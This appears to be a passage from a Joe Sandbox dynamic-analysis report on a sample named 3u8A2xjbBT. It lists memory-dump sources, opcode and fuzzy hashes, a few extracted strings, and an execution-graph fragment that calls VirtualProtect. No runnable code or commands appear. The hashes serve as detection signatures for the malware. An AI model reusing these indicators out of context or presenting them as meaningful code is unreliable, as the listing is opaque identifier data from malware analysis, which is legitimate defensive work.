                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9481d935a40abf7f8de88ef4a26688595fefe56e88b1b2ae506f712e78f1ee7a
                                      • Instruction ID: f2782a775e878cd41e89d5db9675a72d27aa0476a5b5299484b8fdf5e295eb6d
                                      • Opcode Fuzzy Hash: 9481d935a40abf7f8de88ef4a26688595fefe56e88b1b2ae506f712e78f1ee7a
                                      • Instruction Fuzzy Hash: 24218131E003198FDB18DFA9D81569EBBB2FF89300F244529D805BB791DE749E058B95
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08acc4da5041da541efb9b16b1f5130cf2b593d3c6b7cc7e654e8c960e38e9e0
                                      • Instruction ID: ccc44982f603c74b18a335979786c1bd8e7d33bbbcf6f6a95077479172450d4e
                                      • Opcode Fuzzy Hash: 08acc4da5041da541efb9b16b1f5130cf2b593d3c6b7cc7e654e8c960e38e9e0
                                      • Instruction Fuzzy Hash: 8231F174E002298BDB54CFA9C954AAEFBF6BF89300F10916AD519A3741DB309941CF65
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 03e204b43b450a7a667796c3b3331ab735d46c8a8602b6cb98e8f7fdf003342a
                                      • Instruction ID: ced8f6e86cfec25a4e48a4eb0c849135b9d788c6ba154d47661b678bce5139d8
                                      • Opcode Fuzzy Hash: 03e204b43b450a7a667796c3b3331ab735d46c8a8602b6cb98e8f7fdf003342a
                                      • Instruction Fuzzy Hash: 933123B4E04219CFDB54CFA9C964AAEFBF2BF89300F10916AD415A7381EB309941CF65
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a03d323e5c10db38344b4c0e6cd488bbc89499509f09e19dcdd4905437e05974
                                      • Instruction ID: 3d8f0b0523354f8d5657cfe2eedddec256e5778fcc423d23e1602a95b4b74aa8
                                      • Opcode Fuzzy Hash: a03d323e5c10db38344b4c0e6cd488bbc89499509f09e19dcdd4905437e05974
                                      • Instruction Fuzzy Hash: 271177373002049BD3159B66F858E5AB799FBC9265714843AF109C6681CA32D802CB64
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2b393039a690ef43e4557996cd03027389fdd337b75914d4825f7fb269ef4a5
                                      • Instruction ID: 8eeb30a646bccbf31328174352b1fb94ad599562aec1b9d099ebb1f867d54f0b
                                      • Opcode Fuzzy Hash: d2b393039a690ef43e4557996cd03027389fdd337b75914d4825f7fb269ef4a5
                                      • Instruction Fuzzy Hash: AF214531A107158FDB21DF74EC85A5EBBF1EFC4201B108A28D5159B255EF70BE0A8BD1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d00fb239ec47831d28d82342562476675c254454cb134e3cc08ba389e2a8ab59
                                      • Instruction ID: 1080d3d6262944024b9724dd575b355f0916408e4b941129790f737d1c0476dc
                                      • Opcode Fuzzy Hash: d00fb239ec47831d28d82342562476675c254454cb134e3cc08ba389e2a8ab59
                                      • Instruction Fuzzy Hash: 5511A2357202159FCB04EF68E859AAEBBB2FFC9320F008166E915CB394DB309D05CB90
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 661bf61b595fb88d583169e129f9243a36d30516a6e13aceb3dd6306ebc2cf35
                                      • Instruction ID: 96e925156f5d1a949f536b38c93eca7af57a03a63d6f205e1da7df92aac7b793
                                      • Opcode Fuzzy Hash: 661bf61b595fb88d583169e129f9243a36d30516a6e13aceb3dd6306ebc2cf35
                                      • Instruction Fuzzy Hash: 0411E972600606AFCB04DF64EC98D6FBBB5FF48311B14492DE516D3281DB30E945CB94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cce55093bb912983c794ee3f3bfab7fd46c041e198f62cbdb70bbaa4a44e16b9
                                      • Instruction ID: 638828c6e8a72ac8012ecf5580a2cc0bb9bf54b691307b8180cd6e99b2137aca
                                      • Opcode Fuzzy Hash: cce55093bb912983c794ee3f3bfab7fd46c041e198f62cbdb70bbaa4a44e16b9
                                      • Instruction Fuzzy Hash: C01120326043068FCB05DF64E858AAEBFB1FF49210B08496DE452DB282CB30EA01CB91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dfa239091ae4b6bb6ba6a9cbf4c32278ba28587600b0531549b7bf705a7c0489
                                      • Instruction ID: c583324790204dd66c2c9f15b2b3cba307e2e849bb93b32512449d75d694c612
                                      • Opcode Fuzzy Hash: dfa239091ae4b6bb6ba6a9cbf4c32278ba28587600b0531549b7bf705a7c0489
                                      • Instruction Fuzzy Hash: 6A11C235E006188FDF18CFA9D8186DEBBB6BF88700F244528E802BB781CF749D058B91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 988e95233cf740f7e83351f2544139a771631139e71e9e9067f06ce4d0885a3d
                                      • Instruction ID: cb7220f3eef497e15b9e2ac603b4605f3405686144940b798a9d11b029eba3af
                                      • Opcode Fuzzy Hash: 988e95233cf740f7e83351f2544139a771631139e71e9e9067f06ce4d0885a3d
                                      • Instruction Fuzzy Hash: DB017574E021098BCB04CF6EE9816DCFBF2EF88210F10D0B6E51AE7264EA309A118F44
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ceb79dccd669f81fd952e796dbde61b960c1c0e40a9bc148b8e1ac0f52fb2f22
                                      • Instruction ID: c92d06bb947ec58ed1e9125d0afe3248799cd8c2dc43c0e7823cd124abea6183
                                      • Opcode Fuzzy Hash: ceb79dccd669f81fd952e796dbde61b960c1c0e40a9bc148b8e1ac0f52fb2f22
                                      • Instruction Fuzzy Hash: 76F08132314219AF9B049E99FC48DBFBBEEFBC8220714812AF519D3250DB71D80697A4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3707665454.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_d9d000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7945e582da67c29a126b353038d0b6abf90c59cb1ced5265e6697c778af263a
                                      • Instruction ID: e7db19407bad9dad40d7ac2be3bc489dcbb739695986806fc4e7b0d03e3d5408
                                      • Opcode Fuzzy Hash: a7945e582da67c29a126b353038d0b6abf90c59cb1ced5265e6697c778af263a
                                      • Instruction Fuzzy Hash: 2201F2311083449FEB208A25CC84B66FF99EF40321F18C11AED4C0F282C2799C42CAB2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a154294b760d754291f5cb3ceab8f3b2de39f74558bdeb8f40ca82b93500cfe2
                                      • Instruction ID: 33454e33e74d26b8c32edd5e644ef544ea95ac47cf828af6cccb8d889d7acce3
                                      • Opcode Fuzzy Hash: a154294b760d754291f5cb3ceab8f3b2de39f74558bdeb8f40ca82b93500cfe2
                                      • Instruction Fuzzy Hash: 45018675E10215DFDB10DFA8D988A6EBBF9FB8C210F108525E505D7245D7B0ED05C7A1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3707665454.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_d9d000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88a3db79208931e2fc27402376e10879e958fced8516fda3d704df0992b699e6
                                      • Instruction ID: c91336099e0853d666172cd9a81e696bccabf65e98e76d4c78f18f71716911b2
                                      • Opcode Fuzzy Hash: 88a3db79208931e2fc27402376e10879e958fced8516fda3d704df0992b699e6
                                      • Instruction Fuzzy Hash: 5FF0C2710043449FEB148A15C884B62FF9CEB50734F18C15AED0C0E286C2799C40CAB1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ced65782b9e2727c8381c34b85a4761b6beaa0718f279911869fd89ac6a6950
                                      • Instruction ID: 9fdb03483485a15c1c5cbcde7a1310c5df23768ab190af9887e13e7b8cfcec98
                                      • Opcode Fuzzy Hash: 9ced65782b9e2727c8381c34b85a4761b6beaa0718f279911869fd89ac6a6950
                                      • Instruction Fuzzy Hash: 3DF0A7327142195FDB05DE6A9C44FBF7BEDFF85620F18442AE418D3290EB709805C760
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a1b80d931fb1243bdd70c8188cacbde3ea54fc2eb6873df5417d0026e046065
                                      • Instruction ID: d72c033bb38e5efa5219ef9e6a41e782bcf6fa05d1c9b5add2fb41c1fe84d461
                                      • Opcode Fuzzy Hash: 1a1b80d931fb1243bdd70c8188cacbde3ea54fc2eb6873df5417d0026e046065
                                      • Instruction Fuzzy Hash: 77F02736B002188BDF189979EC08BEE7BE7BBC8320F004136E905E3280DF70584587D1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c333a48a709dfc01445b917864a282c610dfcd5f3f50a7d9f861132278afa932
                                      • Instruction ID: b65c218c9339203493976bbf0e33a11fb4f3c78296b811e409d62e399e813948
                                      • Opcode Fuzzy Hash: c333a48a709dfc01445b917864a282c610dfcd5f3f50a7d9f861132278afa932
                                      • Instruction Fuzzy Hash: D5F055337207105B8B29776CBC655AA2BA6CFC5711318426BF509CB38ACEE0CC0743A5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7b7dc35f720cb11375d7abec4d0d17835995b2aca0d51f926c907a640bae19da
                                      • Instruction ID: 478775dce853381af5e6864f6767ce5618745c3cc275135367c9dda9cc0b7b13
                                      • Opcode Fuzzy Hash: 7b7dc35f720cb11375d7abec4d0d17835995b2aca0d51f926c907a640bae19da
                                      • Instruction Fuzzy Hash: 45F0A0323103105BD325EB69EC85B2A7BE9EFC9251F484629F109C7351DBA0AE09C3E6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f32d8fbde28d6f0fa3db51a1355b9d4fa7e23f26bdd0ee265c500412c319323
                                      • Instruction ID: 2511395ad406c867d08ec3c3bb34f3273b2e1bb7f9d4ece99cf9744b5475025a
                                      • Opcode Fuzzy Hash: 5f32d8fbde28d6f0fa3db51a1355b9d4fa7e23f26bdd0ee265c500412c319323
                                      • Instruction Fuzzy Hash: 48F05E35700200ABEB018A59D994B69BB97FFC8220F14D029FD0986291CA72D8528710
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84d82b73eb35520f7e72e3aa0ddc8cd7fb271565a9f58d7aa1f02a28d27ad5e3
                                      • Instruction ID: e9f423c62286fa515eb1a627af6b2fe314c8651255a4ac3a8be08bba9c14996d
                                      • Opcode Fuzzy Hash: 84d82b73eb35520f7e72e3aa0ddc8cd7fb271565a9f58d7aa1f02a28d27ad5e3
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f78d051304b0d38128f76063b192507972cc3c268412456cd899d311d99e988f
                                      • Instruction ID: 765166ba822e34475866b4f2f517742be40cfe30ecfac7c79aed7391effee355
                                      • Opcode Fuzzy Hash: f78d051304b0d38128f76063b192507972cc3c268412456cd899d311d99e988f
                                      • Instruction Fuzzy Hash: DAE0E270D0030CAFCB80EFA8D44579DBBF4AB45200F0085AAA829E7390E7749E50CF81
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ad20eab64330c3bf8eeab170b7c724a9ae68c3552ea2fe23756e799bff0acbb
                                      • Instruction ID: 8eec74f56139b7da5c6b6c6206c49829742f31450b7ae33afd1487885f69165e
                                      • Opcode Fuzzy Hash: 0ad20eab64330c3bf8eeab170b7c724a9ae68c3552ea2fe23756e799bff0acbb
                                      • Instruction Fuzzy Hash: 57E0C23080E3C49FDB42DB78A9247A97FB0AF43201F4840EEC484972B2D7740A58D7A2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 938343f0666b72cf78428553fa5694b3f5b24f6f124128ee342599f338cf3818
                                      • Instruction ID: 7af8fe6de880bdca2fe9811de53ebd9dc3662fbc9bed27b56a935d2b7b260673
                                      • Opcode Fuzzy Hash: 938343f0666b72cf78428553fa5694b3f5b24f6f124128ee342599f338cf3818
                                      • Instruction Fuzzy Hash: C3D06770D45308EBCB40EBBC944579DBBF4AB05201F5045A59949D2240E6705A549795
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52607a03f09bd93803abdee7a078c50fb46c21e90a728aab12caf364f629c19a
                                      • Instruction ID: 86179156622d5504e985b56c4e334d53664c8c2729cd60d2f62e3a92cdff5a2f
                                      • Opcode Fuzzy Hash: 52607a03f09bd93803abdee7a078c50fb46c21e90a728aab12caf364f629c19a
                                      • Instruction Fuzzy Hash: 254171397007058FC720DB28D481E66B7E6FF89754725C9AAE89ACB755DB30EC06CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$(Tt$^\t$$q
                                      • API String ID: 0-3152500879
                                      • Opcode ID: c9c573b359d311c0715ec76864806a66e49a3e71845c760a200a046acfb1795f
                                      • Instruction ID: 10d275af2a2610af399b7c47a2358638fe7708ff76fab46136ad3a6d637cc834
                                      • Opcode Fuzzy Hash: c9c573b359d311c0715ec76864806a66e49a3e71845c760a200a046acfb1795f
                                      • Instruction Fuzzy Hash: 5EB11D34B002088FDB54EBA9D594B6EBBE2BFC8600B548429D40ADB395DF74ED028B91

                                      Execution Graph

                                      Execution Coverage:11.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 24516 182afe0 24517 182b02d VirtualProtect 24516->24517 24518 182b098 24517->24518

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$"\t$"\t$"\t$"\t$(Tt$^\t$$q
                                      • API String ID: 0-1602154313
                                      • Opcode ID: af6fb1b64fedae6c3e4091269f905df068453c4534ee2860267c6ee206e73583
                                      • Instruction ID: 04b04e2146190397576906c572b6e305b4a2a39375c26f67042a983b402e20a3
                                      • Opcode Fuzzy Hash: af6fb1b64fedae6c3e4091269f905df068453c4534ee2860267c6ee206e73583
                                      • Instruction Fuzzy Hash: 53124E35B002059FDB18DF69C594A6EBBF7FF88200B148929E50ADB395DF34ED428B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: su9
                                      • API String ID: 0-4099337347
                                      • Opcode ID: 1a5a35814c1d1f37d328bfb4291ad17ada3db4bce7b73985bbc1a1ffb5e3a80e
                                      • Instruction ID: 19f430d4effc49aeb634b1d28ce4f9471fe0189f50d18b56d58e1faaf92b82bc
                                      • Opcode Fuzzy Hash: 1a5a35814c1d1f37d328bfb4291ad17ada3db4bce7b73985bbc1a1ffb5e3a80e
                                      • Instruction Fuzzy Hash: CCC10278E05218DFCB14CFA9D994A9DBBB2FB89311F10806AD419EB268D7309946CF14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: su9
                                      • API String ID: 0-4099337347
                                      • Opcode ID: 82ee5def971e0f3f2e7c838680f7e2cd5d585cf05fdab32b691103cd3ae30f43
                                      • Instruction ID: e6e4cda34dc7ac196e7f49cc9ed477caaa2c8ee554998d01623706c145e867e4
                                      • Opcode Fuzzy Hash: 82ee5def971e0f3f2e7c838680f7e2cd5d585cf05fdab32b691103cd3ae30f43
                                      • Instruction Fuzzy Hash: 0EC1F278E05218DFCB14CFA9D994A9DBBB2FB89311F10906AD419FB368D7309946CF14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VQfE
                                      • API String ID: 0-2538451675
                                      • Opcode ID: 5f905511739f2a85032d281052f16beae244eea563989f0d029a4dd38a7a34dd
                                      • Instruction ID: 6f0973145b6f5d165c0e3c8ae145823a555fd4b74d8bbf7c3afe17d42369bfbc
                                      • Opcode Fuzzy Hash: 5f905511739f2a85032d281052f16beae244eea563989f0d029a4dd38a7a34dd
                                      • Instruction Fuzzy Hash: 8B91B374E04219CFDB04CFA5C989AAEFBB2FF89310F14802AD415AB364DB389942CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VQfE
                                      • API String ID: 0-2538451675
                                      • Opcode ID: 86e91264cbff990ee1bf9258c6c45f9c6471b483b5e41f295e716f82027cd6bd
                                      • Instruction ID: f57b1ca4616c87563275991eb2c7ec3345c01e487b7aeab57139966a2339d8e1
                                      • Opcode Fuzzy Hash: 86e91264cbff990ee1bf9258c6c45f9c6471b483b5e41f295e716f82027cd6bd
                                      • Instruction Fuzzy Hash: 2E91A474E04219CFDB04CFA5C985AAEFBB2FF89310F14812AD915AB364DB389942CF54
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8395ce15101ad128d82b3dcd2e1f8a5e1b3bcc355f495794d2ac19a40e3e63fa
                                      • Instruction ID: 8920e4e5a093f77189090125ee560a34acd12e3d0ee7a4c6a42262f8cc8de38c
                                      • Opcode Fuzzy Hash: 8395ce15101ad128d82b3dcd2e1f8a5e1b3bcc355f495794d2ac19a40e3e63fa
                                      • Instruction Fuzzy Hash: C9322974E15219DFCB14CFA5E985A9DFBB2FF89200F10966AE449AB325DB30D942CF10
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4669d714ae617ed2824718e2f2cabdc525f6546ef55d011b3e335c4d00c382b8
                                      • Instruction ID: 5de3eaa98f7baf15322d9cf6e8fb70d79462fc1ac479dc53c3abd4989722749e
                                      • Opcode Fuzzy Hash: 4669d714ae617ed2824718e2f2cabdc525f6546ef55d011b3e335c4d00c382b8
                                      • Instruction Fuzzy Hash: 00121474E05219CFCB14CFA9C981A9DBBF2BF89300F1495AAD549BB365DB309A81CF14
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95e4aff1b2183ca5a845dafa17c55312fd6d1a2892839cae29fced9be32dd9ee
                                      • Instruction ID: 2f669ff550e7ccbd5e23716685447d0b26902e90d2c2bb4612cecf9d11e541ad
                                      • Opcode Fuzzy Hash: 95e4aff1b2183ca5a845dafa17c55312fd6d1a2892839cae29fced9be32dd9ee
                                      • Instruction Fuzzy Hash: 3D121474E05219CFDB14CFA9C981A9DBBF2BF89300F1495AAD549BB354EB309A81CF14
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fae5e1f38abdb3682c0eef575a8364b1f480952bacbb98688d59ae216c1a436
                                      • Instruction ID: 2d3dfd2eedde2fa69ad484de6b16d4168989791ec453da0ac7542d023e5ed362
                                      • Opcode Fuzzy Hash: 1fae5e1f38abdb3682c0eef575a8364b1f480952bacbb98688d59ae216c1a436
                                      • Instruction Fuzzy Hash: 2202F374D00228CFDF64CFA8C885B9EBBB1BF49340F1085AAD419B7250EB749A96CF55
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 13dc89317a1ef29e856af97ee7ce0df85780fc38983ab765de7efb14ea127214
                                      • Instruction ID: 90250b3f69c02c60c43570233b3ae802ec905db332a6a4c06d3f169c23d076af
                                      • Opcode Fuzzy Hash: 13dc89317a1ef29e856af97ee7ce0df85780fc38983ab765de7efb14ea127214
                                      • Instruction Fuzzy Hash: 1BF1F474E05219CFDB54CFA9C941A9EBBF2EB89300F24946AC40ABB354DB309E56CF14
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c039a5ad6db882a2fb8878d8d33a9a3553c6ace80aa7d0a9f425137170959b23
                                      • Instruction ID: c81fc969039a9540f4ea46f2fd9148553e89a6bc8142ac81317ba5e11dc8fc39
                                      • Opcode Fuzzy Hash: c039a5ad6db882a2fb8878d8d33a9a3553c6ace80aa7d0a9f425137170959b23
                                      • Instruction Fuzzy Hash: 87F1E374E05219CFDB54CFA9C981A9EBBF2EB89300F24946AC419BB354DB309E56CF14
                                      Memory Dump Source
